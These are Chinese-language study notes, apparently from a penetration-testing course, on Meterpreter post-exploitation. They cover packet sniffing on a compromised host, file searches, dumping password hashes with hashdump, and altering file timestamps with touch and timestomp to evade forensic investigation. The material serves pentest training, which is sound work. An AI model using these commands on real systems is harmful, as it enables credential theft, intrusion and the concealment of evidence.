后渗透阶段-嗅探、痕迹消除

抓包

  • load sniffer
  • sniffer_interfaces
  • sniffer_start 2
  • sniffer_dump 2 1.cap /
  • 在内存中缓存区块循环存储抓包,不写硬盘
  • 智能过滤meterpreter流量,传输全程使用SSL/TLS加密

解码

  • use auxiliary/sniffer/psnuffle
  • set PCAPFILE 1.cap

搜索

  • search -f *.ini
  • search -d c\\documents\ and\ settings\\administrator\desktop\ -f *.docx

破解弱口令密码

  • meterpreter->hashdump即可获得用户名密码,但是用下面的模块

  • use post/windows/gather/hashdump #system权限的meterpreter,如果是弱密码,则会直接显示密码明文

痕迹消除

  • 文件系统访问会留下痕迹,电子取证重点关注

  • 渗透测试和攻击者往往希望销毁文件系统访问痕迹

  • 最好的避免被电子取证发现的方法:不要碰文件系统

    • meterpreter的先天优势:完全基于内存
  • MAC时间(Modified/Accessed/Changed)

    • ls -l –time=xxxx
    • stat 1.txt
    • touch -d “2 days ago” 1.txt
    • touch -t 1501010101 1.txt
  • timestomp

    • timestomp 1.txt -t template.txt
  • MACE:MFT entry

    • MFT:NTFS文件系统的主文件分配表 Master File Table
    • 通常1024字节或2个硬盘扇区,其中存放多项entry信息
    • 包含文件大量信息(大小、名称、目录位置、磁盘位置、创建日期)
    • 更多信息可研究 文件系统取证分析技术